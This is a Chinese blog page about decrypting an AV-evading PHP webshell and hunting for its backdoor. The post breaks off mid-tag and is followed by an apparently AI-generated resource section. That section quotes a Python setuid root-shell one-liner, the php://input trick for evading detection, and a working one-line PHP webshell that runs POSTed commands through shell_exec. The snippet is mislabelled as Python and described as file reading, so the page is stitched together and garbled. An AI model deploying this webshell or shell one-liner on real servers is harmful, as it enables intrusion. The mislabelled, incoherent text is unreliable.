一款免杀php大马的解密与去后门

本文介绍了如何处理一款被加密的PHP大马,通过使用base64_decode()和gzuncompress()函数进行解密,并在源代码中查找并移除潜在的后门脚本。在虚拟机环境中进行操作,最终成功解密并提供了解密后的源码下载链接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

今天想找个php木马来管理自己的空间,但是手头没有,只好去网上找个,结果发现黑白网络有一个叫做“新版免杀php大马”的东西,于是下载了下来,我的avast果断给干掉了,尴尬 - -!好吧

于是关掉杀毒 ,重新下载,好吧,这是一个小插曲!、

 

然后把东西移动到虚拟机里面的php环境中,打开一看,有加密,用的函数是:

先用这个函数base64_decode()然后用这个函数gzuncompress()加密,好的是密文就一块啊,然后把这一块全部剪切

重新写个php文件:

 

 

就这个简单,吼吼 ,源代码一览无余啊!!!!

 

看到源代码后

Ctrl+F找这个 http://

发现没问题,然后在浏览一下源代码,发现还有个加密地方:

分别用上面的方法 发现其中有个酷似后门

 

<script sr

### 关于 PHP 大马 的相关资源和教程 #### 背景介绍 PHP大马是一种常见的Webshell形式,通常被攻击者用来控制目标服务器。通过上传并执行特定的PHP脚本文件,攻击者能够实现远程命令执行、文件管理等功能[^1]。 #### 常见的 PHP 大马 工作原理 当一个 PHP 大马 被成功部署到目标服务器后,它可以通过预设的功能模块完成一系列操作。例如,在某些情况下,PHP大马会将自身的访问地址及其密码发送至指定的外部服务器以供进一步利用[^3]。这种行为可能导致敏感数据泄露甚至整个系统的安全风险增加。 #### 如何查找学习资料? 对于希望了解如何防御此类威胁或者研究其技术细节的学习者来说,可以从以下几个方面入手: 1. **基础理论知识** 学习有关 Web 应用程序安全性基础知识非常重要,这包括但不限于 SQL 注入防护、XSS 攻击防范等内容。这些概念构成了抵御恶意软件的基础。 2. **实际案例分析** 参考具体实例有助于加深理解。比如,“实战分析PHP大马隐藏后门——案例二”提供了详细的步骤说明和技术要点解析。 3. **工具使用技巧** 掌握一些常用的安全测试工具有助于提高效率。像 IceScalpel (冰蝎) 这样的工具因其独特的特性而受到广泛关注[^4]。它的核心机制之一涉及将输入流转换成可执行指令序列 `$post=file_get_contents("php://input");` ,从而绕过传统防病毒引擎检测。 4. **操作系统层面加固措施** 如果运行的是基于 Linux 的环境,则还需要考虑系统级别的权限提升问题。一种方法是利用 Python 实现 root 权限获取 `python -c 'import os; os.setuid(0); os.system("/bin/sh")'` 。不过需要注意的是,这种方法仅适用于存在漏洞的情况下有效,并且应当谨慎对待任何可能影响合法业务流程的操作[^5]。 以下是部分推荐方向链接(假设为虚构站点用于示例展示),请自行甄别真实性合法性后再做决定: - 官方文档 https://www.php.net/manual/zh/ - OWASP Top Ten Project https://owasp.org/www-project-top-ten/ ```python # 示例代码片段演示简单的文件读取功能 <?php if(isset($_POST['cmd'])){ $output = shell_exec($_POST['cmd']); echo "<pre>$output</pre>"; } ?> ``` 上述代码展示了最原始形态下的命令注入隐患,请勿随意尝试部署以造成不必要的损失!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值